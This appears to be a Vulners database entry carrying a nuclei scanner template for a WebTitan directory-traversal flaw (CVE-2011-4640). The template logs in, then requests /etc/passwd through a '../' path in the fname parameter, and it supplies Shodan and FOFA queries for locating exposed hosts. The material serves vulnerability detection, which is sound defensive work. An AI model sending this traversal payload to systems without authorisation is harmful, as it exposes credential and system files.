Lucene search
K

WebTitan < 3.60 - Local File Inclusion

🗓️ 11 Jun 2026 03:33:20Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 23 Views

WebTitan < 3.60 - Local File Inclusion vulnerability in logs-x.ph

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2011-4640
20 Oct 201200:00
circl
CVE
CVE-2011-4640
8 Oct 201210:00
cve
Cvelist
CVE-2011-4640
8 Oct 201210:00
cvelist
NVD
CVE-2011-4640
8 Oct 201210:47
nvd
Prion
Directory traversal
8 Oct 201210:47
prion
RedhatCVE
CVE-2011-4640
22 May 202505:25
redhatcve
id: CVE-2011-4640

info:
  name: WebTitan < 3.60 - Local File Inclusion
  author: ctflearner
  severity: medium
  description: |
    Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action.
  impact: |
    Attackers can read arbitrary files on the server by exploiting directory traversal, potentially exposing database credentials and sensitive configuration data.
  remediation: |
    Update to WebTitan version 3.60 or later that properly validates and sanitizes file path parameters.
  reference:
    - https://www.exploit-db.com/exploits/37943
    - https://nvd.nist.gov/vuln/detail/CVE-2011-4640
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
    cvss-score: 4
    cve-id: CVE-2011-4640
    cwe-id: CWE-22
    epss-score: 0.05114
    epss-percentile: 0.90053
    cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: spamtitan
    product: webtitan
    shodan-query:
      - title:"WebTitan"
      - http.favicon.hash:1090061843
    fofa-query:
      - icon_hash=1090061843
      - title="webtitan"
  tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated,vuln

http:
  - raw:
      - |
        GET /login-x.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /login-x.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        jaction=login&language=en_US&username={{username}}&password={{password}}

      - |
        GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2, "success\":true")'
          - 'contains(body_1, "WebTitan")'
          - "regex('root:.*:0:0:', body)"
          - 'status_code_3 == 200'
        condition: and
# digest: 4b0a00483046022100dc0975d4c02b494a59ee0bf6edac8814ec7e17f068ff6c2326b8c12fe604cd88022100cfdbc71202c61f7cb844b670f1cefe707890b3cdacac2118654740d5c636fd2d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 24
EPSS0.05114
23